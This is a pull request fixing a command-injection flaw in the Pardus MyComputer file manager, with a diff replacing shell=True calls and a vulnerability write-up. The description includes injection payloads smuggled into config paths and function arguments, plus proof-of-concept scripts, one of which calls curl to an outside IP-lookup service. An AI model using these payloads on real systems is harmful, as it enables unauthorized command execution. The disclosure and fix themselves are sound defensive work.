### PR TITLE
FIX: Arbitrary Code Injection in the saved places

### DIFF
--- a/setup.py
+++ b/setup.py
@@ -12,12 +12,13 @@ def create_mo_files():
     mo = []
     for po in os.listdir(podir):
         if po.endswith(".po"):
-            os.makedirs("{}/{}/LC_MESSAGES".format(podir, po.split(".po")[0]), exist_ok=True)
-            mo_file = "{}/{}/LC_MESSAGES/{}".format(podir, po.split(".po")[0], "pardus-mycomputer.mo")
-            msgfmt_cmd = 'msgfmt {} -o {}'.format(podir + "/" + po, mo_file)
-            subprocess.call(msgfmt_cmd, shell=True)
-            mo.append(("/usr/share/locale/" + po.split(".po")[0] + "/LC_MESSAGES",
-                       ["po/" + po.split(".po")[0] + "/LC_MESSAGES/pardus-mycomputer.mo"]))
+            lang = po[:-3]
+            local_dir = os.path.join(podir, lang, "LC_MESSAGES")
+            os.makedirs(local_dir, exist_ok=True)
+            mo_file = os.path.join(local_dir, "pardus-mycomputer.mo")
+
+            subprocess.call(["msgfmt", os.path.join(podir, po), "-o", mo_file])
+            mo.append((f"/usr/share/locale/{lang}/LC_MESSAGES", [mo_file]))
     return mo
 
 

--- a/src/MainWindow.py
+++ b/src/MainWindow.py
@@ -1620,7 +1620,8 @@ class MainWindow:
             if isinstance(mount, str):
                 self.on_btn_mount_connect_clicked(button=None, from_saved=True, saved_uri=mount)
             else:
-                subprocess.run(["xdg-open", mount.get_root().get_path()])
+
+                subprocess.Popen(["xdg-open", mount.get_root().get_path()])
 
     def on_btn_unmount_clicked(self, button):
         self.actioned_volume = button
@@ -1768,12 +1769,12 @@ class MainWindow:
             if isinstance(mount, str):
                 self.on_btn_mount_connect_clicked(button=None, from_saved=True, saved_uri=mount)
             else:
-                th = subprocess.Popen("xdg-open '{}' &".format(mount.get_root().get_path()), shell=True)
-                th.communicate()
+
+                subprocess.Popen(["xdg-open", mount.get_root().get_path()])
 
                 # some times phone's disk usage infos not showing on first mount,
                 # we can update this values on phone row clicked
-                # fix this late
+                # fix this later
                 if row._type == "phone":
                     self.showVolumeSizes(row)
 
@@ -2122,8 +2123,8 @@ class MainWindow:
                     print("operation cancelled")
                 else:
                     if from_places:
-                        th = subprocess.Popen("xdg-open '{}' &".format(saved_uri), shell=True)
-                        th.communicate()
+
+                        subprocess.Popen(["xdg-open", saved_uri])
                         if self.UserSettings.config_closeapp_main:
                             self.on_window_delete_event(self.window)
                     else:


### PR DESCRIPTION
The Pardus MyComputer application executes directory paths that the user has added to the “Places Saved” list directly in a `shell` command (`xdg-open`). A user-controlled JSON input (e.g. a record added to the `places-saved` file) can be used to inject malicious shellcode and execute an arbitrary command on the operating system when clicked.

#### Effect
- Executing user-level code running the application with local user rights (Arbitrary Code Injection).  
- File creation, deletion, network requests or additional user commands can be executed on the system.  
- Risks of unauthorized data read/write, malicious script installation, service interruption or data leakage.

#### Technical Details
- MainWindow.py in `subprocess.Popen("xdg-open '{}' &".format(path), shell=True)` call.  
- The use of `shell=True` and concatenated string leads to the execution of payloads like `'; ...; #` in path.  
- The application parses the JSON line inserted in `places-saved` and executes this code directly on click.

#### Attack Steps (Example)
1. Add the following one-line JSON entry to `~/.config/pardus-mycomputer/places-saved`:  
 ```json
 {"path":"/tmp/fake'; touch /tmp/pwned; #", "name": "Exploit Test", "icon": "folder-symbolic"}
 ``` 
2. The application restarts and the record named "Exploit Test" appears in the "Places" list.  
3. When the user clicks on this record, the file `/tmp/pwned` is created - the command injection is successful.

#### CVSS Guess
7.0-8.0 (AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

#### Proposed Solution
- Call Shell commands with list arguments:
  ```python
  subprocess.Popen(["xdg-open", path])
  ```  
  Avoid the use of `shell=True` and concatenated strings.
- Input validation and/or escaping: If directory paths are user-controllable, always implement `shlex.quote()` or similar safe escape functions.
- Parse configuration files safely: Make sure to use real JSON format and avoid raw `eval`/`repr` like transformations.

These fixes will prevent user-controlled input from combining with a shell command to execute malicious code.

I also leave 2 sample codes for those who want to try:
##### 1. test
```py
import os
import sys

sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'src')))
from DiskManager import (
    get_uuid_from_dev,
    is_drive_automounted,
    set_automounted,
    get_filesystem_of_partition
)

bad = 'dummy; touch /tmp/pwned_uuid; #'
try:
    get_uuid_from_dev(bad)
except Exception as e:
    print(e)
print("UUID exploit created /tmp/pwned_uuid:", os.path.exists("/tmp/pwned_uuid"))

bad = 'dummy; touch /tmp/pwned_auto; #'
try:
    is_drive_automounted(bad)
except Exception as e:
    print(e)
print("is_drive exploit created /tmp/pwned_auto:", os.path.exists("/tmp/pwned_auto"))

bad = 'dummy; touch /tmp/pwned_fstab; #'
try:
    set_automounted(bad, True)
except Exception as e:
    print(e)
print("fstab exploit created /tmp/pwned_fstab:", os.path.exists("/tmp/pwned_fstab"))

bad = 'sda1"; touch /tmp/pwned_fs; #'
try:
    get_filesystem_of_partition(bad)
except Exception as e:
    print(e)
print("fstype exploit created /tmp/pwned_fs:", os.path.exists("/tmp/pwned_fs"))
```
2. in-app test
```py
#!/usr/bin/env python3
import os
import json
from pathlib import Path
from gi.repository import GLib

base_dir = "/tmp/fake"
os.makedirs(base_dir, exist_ok=True)
print(f"→ Created base dir {base_dir!r}")

vulndir = f"{base_dir}'; ip=$(curl -s ifconfig.me); mkdir -p /tmp/$ip; #"
print(f"→ Payload dir {vulndir!r}")

conf_root = Path(GLib.get_user_config_dir()) / "pardus-mycomputer"
if not conf_root.exists():
    conf_root = Path(GLib.get_user_config_dir()) / "pardus" / "pardus-mycomputer"
conf_root.mkdir(parents=True, exist_ok=True)

places_file = conf_root / "places-saved"
places_file.touch(exist_ok=True)
entry = {"path": vulndir, "name": "Fetch IP Exploit", "icon": "folder-symbolic"}
with open(places_file, "a") as f:
    f.write(json.dumps(entry) + "\n")
print(f"→ Appended exploit entry to {places_file}")
```
run:
```sh
chmod +x ./exploit.py
./exploit.py
```